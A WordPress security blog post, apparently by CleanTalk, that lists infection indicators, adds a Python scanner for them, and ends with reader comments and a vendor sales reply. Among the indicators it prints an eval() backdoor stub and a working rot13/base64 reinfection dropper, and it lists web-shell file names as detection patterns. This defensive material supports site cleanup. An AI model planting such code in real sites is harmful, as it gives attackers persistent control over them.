Hi guys,
I’d like to share some significant signals that indicate an infection on a WordPress site. This data has been collected by our research team at CleanTalk: the team reviews up to 10k files weekly, and we maintain over 1,600 signatures of malicious files.
How do I understand that my website is infected?
Before we look at the malware signs themselves, let’s go over the typical symptoms that show a WordPress site has been infected:
- HTTP redirects to third-party sites that fire automatically when the website is opened.
- The site responds much more slowly than it used to.
- The hosting provider notifies you about unusual utilization of server resources such as CPU or inbound/outbound traffic.
- A huge amount of outgoing email from the server that hosts your website.
- Broken design (HTML layout) of the website.
Signs of Malware files and Malicious code
Okay, here are the signs of malware on a site:
1. Files with the names below found outside their legitimate location. wp-login.php and xmlrpc.php belong in the WordPress root (WP_ROOT); admin-ajax.php, options.php and admin.php belong in WP_ROOT/wp-admin/. A copy anywhere else (for example inside wp-content/) is a red flag:
wp-login.php
xmlrpc.php
admin-ajax.php
options.php
admin.php
2. A file named KGks.js.php is 100% malicious.
3. Files with the name pattern and location WP_ROOT/wp-XXXXXXX.php (for example WP_ROOT/wp-canvas.php or WP_ROOT/wp-controller.php) that contain code like this (the payload arrives as the function argument and is executed by eval(); the comments are decoys):
function getid3_lib($canonicalizedHeaders)
{ // Browser compatibility.
eval($canonicalizedHeaders);
} // Remove the JSON file.
4. Any file without an extension whose name consists only of digits, for example 84639 or 5718129.
5. Files with content like this. The digit-named file is a rot13 + base64 encoded copy of the payload; whenever index.php no longer matches it, index.php is rewritten from that copy and set read-only, which is how the infection survives a cleanup:
<?php
$ddscdws = "index.php";
$acdfadfasf = file_get_contents($ddscdws);
// encoded copy of the payload, stored as an extension-less digit-named file (see sign 4)
$sdfdsdfh = "/home3/.../public_html/starmap/wp-content/plugins/astra-widgets/admin/bsf-analytics/assets/css/93917";
if (file_exists($sdfdsdfh)) {
    $iide = file_get_contents($sdfdsdfh);
    $iide = base64_decode(str_rot13($iide));
    // re-infect index.php whenever it differs from the stored payload
    if (md5($acdfadfasf) != md5($iide)) {
        @chmod($ddscdws, 0644);
        @file_put_contents($ddscdws, $iide);
        @chmod($ddscdws, 0444);
    }
}
6. Files with the names from the list below are most likely malware. Note that xmlrpc.php, admin.php and profile.php are also legitimate core file names (in WP_ROOT and WP_ROOT/wp-admin/ respectively), and category.php and image.php are standard theme template names, so for those the signal is the file turning up somewhere else, such as under wp-content/plugins/ or wp-content/uploads/:
radio.php,
ajax.php,
wso.php,
cmd.php,
shell.php,
reverse_shell.php,
profile.php,
xmlrpc.php,
css.php,
category.php,
image.php,
admin.php,
impositive.php,
esp.php,
shellron.php.
Here is a detailed case of how radio.php infects WordPress.
7. Any *.php files located inside WP_ROOT/wp-content/uploads/.
8. Any suspicious code (eval(), base64_decode(), str_rot13() and similar) inside these files:
WP_ROOT/index.php
WP_ROOT/wp-settings.php
WP_ROOT/wp-config.php
9. Files with random-looking names like 1gkj2saf.php, 862349.php, Ads8DU2.php, etc.
10. Hidden files with the extensions .otc, .ott or .css are close to 100% malicious, for example .gk23sa.css, .1942t53.ott or .2634gkgre.otc.
As you can see, attackers rely on server-side executable files to run their malware, which is why you have to keep an eye on suspicious .php files on your WordPress site. As a bonus, here are a few screenshots from our backend of good examples of malware files.
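To turn the ten signs above into something you can run against a site, here is an added example scanner (written for this post, not CleanTalk’s plugin or the scanner behind these statistics). It walks a WordPress tree and reports each indicator by rule name, and for sign 4/5 it also tries to undo the dropper’s base64_decode(str_rot13()) encoding to confirm that a digit-named file really holds PHP. The core-file locations and the list of wp-*.php files that core ships in WP_ROOT are from WordPress itself; the sign 9 name pattern and the theme-template exception for category.php/image.php are heuristics assumed here, and everything written by build_sample_tree() is constructed sample data, not real infected files.

```python
"""Scan a WordPress tree for the indicators listed in this post.

Added example, not CleanTalk's code. Rules are heuristics derived from the
signs above; the sample files in build_sample_tree() are constructed.
"""
import base64
import codecs
import re
import sys
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# Signs 2 and 6: names the post lists as (almost always) malware. The core
# names from that list (xmlrpc.php, admin.php, profile.php) are handled by
# CORE_LOCATIONS instead, because they are legitimate in one place.
KNOWN_BAD_NAMES = {
    "kgks.js.php", "radio.php", "ajax.php", "wso.php", "cmd.php", "shell.php",
    "reverse_shell.php", "css.php", "category.php", "image.php",
    "impositive.php", "esp.php", "shellron.php",
}
# Assumption: these two are also theme template names, so they are only
# flagged outside wp-content/themes/.
THEME_TEMPLATES = {"category.php", "image.php"}

# Sign 1: core file names and the directories (relative to WP_ROOT) where a
# copy is legitimate. Anywhere else the name is a red flag.
CORE_LOCATIONS = {
    "wp-login.php": {"."}, "xmlrpc.php": {"."},
    "admin-ajax.php": {"wp-admin"}, "options.php": {"wp-admin"},
    "admin.php": {"wp-admin", "wp-admin/includes"}, "profile.php": {"wp-admin"},
}
# Sign 3: the wp-*.php files WordPress core actually ships in WP_ROOT.
CORE_ROOT_WP_FILES = {
    "wp-activate.php", "wp-blog-header.php", "wp-comments-post.php",
    "wp-config.php", "wp-config-sample.php", "wp-cron.php", "wp-links-opml.php",
    "wp-load.php", "wp-login.php", "wp-mail.php", "wp-settings.php",
    "wp-signup.php", "wp-trackback.php",
}
WP_PREFIXED = re.compile(r"^wp-[a-z0-9_]+\.php$")
DIGITS_ONLY = re.compile(r"^\d+$")                        # sign 4: 84639
RANDOM_PHP = re.compile(r"^(?=.*\d)[a-z0-9]{6,}\.php$")   # sign 9: 1gkj2saf.php (heuristic)
HIDDEN_FILE = re.compile(r"^\.[a-z0-9]+\.(otc|ott|css)$")  # sign 10: .gk23sa.css
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".php7", ".phar")
SUSPICIOUS_CALLS = re.compile(
    rb"\b(eval|base64_decode|str_rot13|gzinflate|gzuncompress|create_function)\s*\(")

Finding = Tuple[str, str, str]  # (rule, path relative to WP_ROOT, note)


def decode_rot13_base64(data: bytes) -> Optional[bytes]:
    """Undo base64_decode(str_rot13($x)) as used by the sign-5 dropper.

    rot13 is its own inverse and, like PHP's str_rot13, only rotates ASCII
    letters, so the base64 alphabet survives: rotate first, then decode.
    """
    try:
        return base64.b64decode(codecs.decode(data.decode("ascii"), "rot13"))
    except (UnicodeDecodeError, ValueError):
        return None


def scan(wp_root) -> List[Finding]:
    root = Path(wp_root)
    findings: List[Finding] = []

    def add(rule: str, path: Path, note: str = "") -> None:
        findings.append((rule, path.relative_to(root).as_posix(), note))

    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        name, lname = path.name, path.name.lower()
        parts = path.relative_to(root).parts
        parent = path.parent.relative_to(root).as_posix()  # "." for WP_ROOT itself
        if parts[:2] == ("wp-content", "uploads") and lname.endswith(PHP_EXTENSIONS):
            add("php-in-uploads", path)                                   # sign 7
        if lname in CORE_LOCATIONS and parent not in CORE_LOCATIONS[lname]:
            add("core-name-misplaced", path,                              # sign 1
                "legitimate only in " + ", ".join(sorted(CORE_LOCATIONS[lname])))
        if lname in KNOWN_BAD_NAMES and not (
                lname in THEME_TEMPLATES and parts[:2] == ("wp-content", "themes")):
            add("known-bad-name", path)                                   # signs 2, 6
        if parent == "." and WP_PREFIXED.match(lname) and lname not in CORE_ROOT_WP_FILES:
            has_eval = re.search(rb"\beval\s*\(", path.read_bytes()) is not None
            add("fake-core-file", path, "contains eval(" if has_eval else "")  # sign 3
        if parent == "." and lname in {"index.php", "wp-settings.php", "wp-config.php"}:
            hits = sorted({m.group(1).decode() for m in SUSPICIOUS_CALLS.finditer(path.read_bytes())})
            if hits:
                add("suspicious-call-in-core", path, ", ".join(hits))     # sign 8
        if DIGITS_ONLY.match(name):                                       # signs 4, 5
            payload = decode_rot13_base64(path.read_bytes())
            encoded = payload is not None and b"<?php" in payload
            add("digit-named-file", path, "rot13+base64 encoded PHP payload" if encoded else "")
        if RANDOM_PHP.match(lname):
            add("random-php-name", path)                                  # sign 9
        if HIDDEN_FILE.match(lname):
            add("hidden-style-file", path)                                # sign 10
    return findings


def build_sample_tree(base: Path) -> Path:
    """Write a constructed tree mixing clean core files with one hit per sign."""
    payload = b"<?php /* constructed sample payload */ echo 'x';"
    encoded = codecs.encode(base64.b64encode(payload).decode("ascii"), "rot13")
    files = {
        "index.php": "<?php require __DIR__ . '/wp-blog-header.php';",
        "wp-settings.php": "<?php // clean", "wp-config.php": "<?php define('DB_NAME', 'wp');",
        "wp-login.php": "<?php // core", "xmlrpc.php": "<?php // core",
        "wp-admin/admin-ajax.php": "<?php // core",
        "wp-canvas.php": "<?php function getid3_lib($h) { eval($h); }",      # sign 3
        "wp-content/uploads/2024/10/shell.php": "<?php // sample web shell",   # signs 6, 7
        "wp-content/plugins/sample-plugin/93917": encoded,                    # signs 4, 5
        "wp-content/plugins/sample-plugin/admin.php": "<?php // misplaced",   # sign 1
        "wp-content/themes/sample-theme/category.php": "<?php get_header();",  # legit
        "wp-content/.gk23sa.css": "<?php // hidden dropper",                  # sign 10
        "wp-content/plugins/sample-plugin/1gkj2saf.php": "<?php // dropper",  # sign 9
    }
    for rel, content in files.items():
        (base / rel).parent.mkdir(parents=True, exist_ok=True)
        (base / rel).write_text(content)
    return base


def scan_sample_tree() -> List[Finding]:
    """Build the constructed tree in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    results = scan(sys.argv[1]) if len(sys.argv) > 1 else scan_sample_tree()
    for rule, rel, note in results:
        print(f"{rule:24} {rel}" + (f"  ({note})" if note else ""))
```

Run it as `python wpscan.py /path/to/wordpress` to scan a real tree, or with no argument to see the constructed sample. Treat the output as a triage list rather than a verdict: php-in-uploads, fake-core-file with eval(, hidden-style-file and a decoded digit-named payload are near-certain, while random-php-name is a heuristic that will occasionally catch a legitimately odd plugin file.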
Please let me know your thoughts in the comment section down below.
Update on October 23, 2024
System cron is another way to (re)infect WordPress; details here: https://research.cleantalk.org/cron-as-the-way-to-re-infect-wordpress/
Hello. Files with bizarre names that are 0 bytes in size… I have a ton of them on many websites that were hosted for several years at InterServer.
I’ve moved out and am trying to clean them up. Do you know the name of a malware that generates up to thousands of odd-named files of size “0”?
Thank you.
Hello, Kathleen Pageot.
Thank you for reaching out. The presence of numerous bizarrely named files with a size of 0 bytes is indeed a common issue caused by certain types of malware that have become quite popular recently. This malware can create these empty files as part of its activity, potentially compromising your website’s integrity and performance.
To help you effectively combat this issue, we highly recommend downloading our specialized malware detection plugin – Security by CleanTalk (https://wordpress.org/plugins/security-malware-firewall/). It is designed to identify and eliminate various forms of malware, including the one you’re experiencing, and it’s user-friendly, making it easy to use for anyone.
Additionally, if you’re looking for a more thorough solution, we offer a deep, manual malware removal service for your site (https://l.cleantalk.org/website-malware-removal). Our experienced team will meticulously inspect your website, remove any malicious files, and ensure that your site is secure moving forward. As a special gift, when you contact us for manual removal of malware, we’ll provide you with a one-year license for our security plugin at no extra cost!
We’re confident that either our plugin or our cleaning service will effectively help you remove these unwanted files and safeguard your site against future threats. Should you have any questions or need further assistance, please feel free to reach out. Our team is here to support you!
Best regards